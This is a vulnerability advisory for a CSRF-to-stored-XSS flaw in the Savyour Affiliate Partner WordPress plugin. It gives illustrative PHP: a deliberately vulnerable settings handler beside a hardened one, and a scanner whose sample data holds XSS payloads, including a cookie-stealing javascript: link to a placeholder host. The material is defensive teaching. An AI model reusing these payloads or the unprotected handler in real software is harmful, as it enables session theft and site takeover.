CVE-2025-48306

Affected plugin: Savyour Affiliate Partner (vendor: developers)

Executive summary

A high-severity (CVSS 7.1) Cross-Site Request Forgery (CSRF) vulnerability in the Savyour Affiliate Partner WordPress plugin lets an unauthenticated attacker who can lure a logged-in administrator to a crafted page store a malicious script on the site (Stored XSS). The script then executes in the browsers of visitors and administrators, which can lead to full compromise of the website.

Vulnerability

The plugin is vulnerable to Cross-Site Request Forgery (CSRF): a state-changing request handled by the plugin is accepted without proof that the administrator intended to send it (in WordPress plugins this is typically a missing or unchecked nonce). An unauthenticated attacker can therefore host a page that silently submits such a request; if an authenticated administrator visits that page, the administrator's browser sends the request with the admin session cookies, and the attacker-supplied value is stored. Because the stored value is later rendered without adequate sanitization or escaping, the result is a persistent malicious script (Stored XSS) in the web application's database. Exploitation requires user interaction (the administrator must open the attacker's page while logged in) but no credentials.
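The snippet below is an added illustration, not code from the Savyour Affiliate Partner plugin (the plugin's actual handler, option names and fixed version are not published on this page). It shows the general pattern behind a CSRF-to-stored-XSS bug in a WordPress settings page, using a hypothetical option `example_affiliate_banner` and hypothetical function names, and places the hardened form beside it. It assumes it is loaded inside WordPress, so `check_admin_referer`, `wp_nonce_field`, `current_user_can`, `sanitize_text_field`, `esc_html` and the other `wp_*`/`esc_*` calls are the real WordPress APIs.

```php
<?php
/*
 * Added example (not the Savyour plugin's code). The option name, action name
 * and function names are hypothetical. Assumes execution inside WordPress.
 */

// --- VULNERABLE pattern: no nonce, no capability check, no sanitisation and
// no output escaping. A cross-site page that auto-submits a POST carrying
// example_affiliate_banner=<script>... while an administrator is logged in
// gets its payload stored via update_option() and rendered to every visitor.
function example_vulnerable_save_settings() {
    if ( isset( $_POST['example_affiliate_banner'] ) ) {
        update_option( 'example_affiliate_banner', wp_unslash( $_POST['example_affiliate_banner'] ) );
    }
}

function example_vulnerable_render_banner() {
    // Stored XSS: the stored value is echoed raw into the page.
    echo '<div class="affiliate-banner">' . get_option( 'example_affiliate_banner', '' ) . '</div>';
}

// --- HARDENED pattern: nonce + capability check on the write path,
// sanitisation on storage, escaping on output.
function example_hardened_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'example_save_settings', 'example_nonce' ); ?>
        <input type="hidden" name="action" value="example_save_settings">
        <input type="text" name="example_affiliate_banner"
               value="<?php echo esc_attr( get_option( 'example_affiliate_banner', '' ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}

function example_hardened_save_settings() {
    // 1. Only users who may manage options can save (stops low-privilege accounts).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    // 2. The nonce ties the request to a form this site rendered for this user;
    //    a request forged from another origin has no valid nonce and dies here.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // 3. Store only a sanitised value (strips tags, so no script is persisted).
    $raw   = isset( $_POST['example_affiliate_banner'] ) ? wp_unslash( $_POST['example_affiliate_banner'] ) : '';
    $clean = sanitize_text_field( $raw );
    update_option( 'example_affiliate_banner', $clean );

    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ) );
    exit;
}
add_action( 'admin_post_example_save_settings', 'example_hardened_save_settings' );

function example_hardened_render_banner() {
    // 4. Escape on output regardless of what is stored, so even a value that
    //    reached the database through another path cannot execute.
    echo '<div class="affiliate-banner">' . esc_html( get_option( 'example_affiliate_banner', '' ) ) . '</div>';
}
```

The nonce check is what closes the CSRF: WordPress nonces are bound to the logged-in user and expire, so an attacker page cannot obtain one. Sanitising on save and escaping on output are independent layers; either one alone would have blocked the stored script, and the fix should keep both.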

Business impact

With a CVSS score of 7.1 (High), this vulnerability represents a significant risk. Because the injected script is stored server-side, it executes in the browsers of every visitor and administrator who loads the affected content. In a visitor's browser this enables defacement, credential phishing, or redirection to malicious sites; in an administrator's browser it runs with the administrator's session and can perform any admin action, which is what makes full compromise of the website possible. Each of these outcomes damages the organization's reputation and user trust.

Remediation

Immediate Action: Update the Savyour Affiliate Partner plugin to the latest version, which addresses this vulnerability, and confirm the installed version afterwards. Until the update is applied, administrators should avoid browsing untrusted sites while logged in to the WordPress dashboard, since a logged-in session is what the attack needs.

Proactive Monitoring: Scan the plugin's stored settings, website pages and database entries (for example the options and post content tables) for unexpected script tags, inline event handlers, or javascript: URIs. Review recent settings changes and other administrative actions that no administrator remembers performing, as these are the footprint of a successful CSRF.
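As an added example (not part of this advisory or of the plugin), the following self-contained PHP script shows the kind of check the monitoring step describes: it scans name/value records of the sort pulled from WordPress options or post meta for common markers of injected script, including payloads that were stored HTML-entity-encoded. The sample rows are constructed for the demonstration; the option names are hypothetical.

```php
<?php
/*
 * Added example, not part of the advisory or the plugin. Scans key/value
 * records (e.g. rows exported from wp_options or wp_postmeta) for markers of
 * injected script. The sample records below are constructed, not real data.
 */

/**
 * Return the names of the indicator patterns that matched $value,
 * or an empty array if nothing suspicious was found.
 */
function find_script_indicators( string $value ): array {
    $patterns = [
        'script_tag'     => '/<\s*script\b/i',
        'event_handler'  => '/\bon[a-z]+\s*=/i',          // onerror=, onload=, ...
        'javascript_uri' => '/javascript\s*:/i',
        'data_uri_html'  => '/data\s*:\s*text\/html/i',
        'srcdoc_iframe'  => '/<\s*iframe\b[^>]*\bsrcdoc\s*=/i',
        'svg_onload'     => '/<\s*svg\b[^>]*\bonload\s*=/i',
    ];
    // Also inspect the entity-decoded form, so a payload that some code path
    // stored as &lt;script&gt; still surfaces in the audit.
    $candidates = [ $value, html_entity_decode( $value, ENT_QUOTES | ENT_HTML5, 'UTF-8' ) ];
    $hits = [];
    foreach ( $patterns as $name => $re ) {
        foreach ( $candidates as $candidate ) {
            if ( preg_match( $re, $candidate ) ) {
                $hits[] = $name;
                break;
            }
        }
    }
    return $hits;
}

/**
 * @param array<string,string> $records  name => stored value
 * @return array<string,string[]>        name => matched indicators (flagged rows only)
 */
function scan_records( array $records ): array {
    $flagged = [];
    foreach ( $records as $name => $value ) {
        $hits = find_script_indicators( (string) $value );
        if ( $hits ) {
            $flagged[ $name ] = $hits;
        }
    }
    return $flagged;
}

// Constructed sample rows shaped like wp_options entries (hypothetical names).
$sample = [
    'example_affiliate_banner' => 'Shop with our partners!',
    'example_affiliate_footer' => '<script src="https://example.invalid/x.js"></script>',
    'example_affiliate_link'   => '<a href="javascript:fetch(\'//example.invalid/?c=\'+document.cookie)">Deals</a>',
    'example_affiliate_logo'   => '<img src=x onerror="alert(1)">',
    'example_encoded_payload'  => '&lt;script&gt;alert(1)&lt;/script&gt;',
    'blogname'                 => 'My Store',
];

// Prints one line per flagged row; clean rows (banner, blogname) are omitted.
foreach ( scan_records( $sample ) as $name => $hits ) {
    printf( "%-26s %s\n", $name, implode( ', ', $hits ) );
}
```

Run it with `php scan.php`. To feed it real data, export the rows first, for example with WP-CLI: `wp db query "SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%<script%' OR option_value LIKE '%javascript:%'"` (adjust `wp_` to the site's table prefix). The SQL LIKE filter is a coarse first pass; the regex checks above catch the encoded and attribute-based variants that a plain substring search misses.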

Compensating Controls: If immediate patching is not possible, a Web Application Firewall (WAF) with rules that block script payloads in request bodies, and that reject state-changing admin requests whose Origin or Referer header points outside the site, reduces exposure. Note that a WAF cannot fully close a CSRF, because the forged request is sent by the administrator's own browser with a valid session and looks largely legitimate; treat it as a stopgap, not a substitute for the update.

Exploitation status

Public Exploit Available: false

Analyst recommendation

This vulnerability provides a direct pathway for an attacker to gain control over the content and user sessions of the affected website. The High severity rating underscores the urgency of this issue. Administrators must prioritize updating the plugin to the patched version immediately.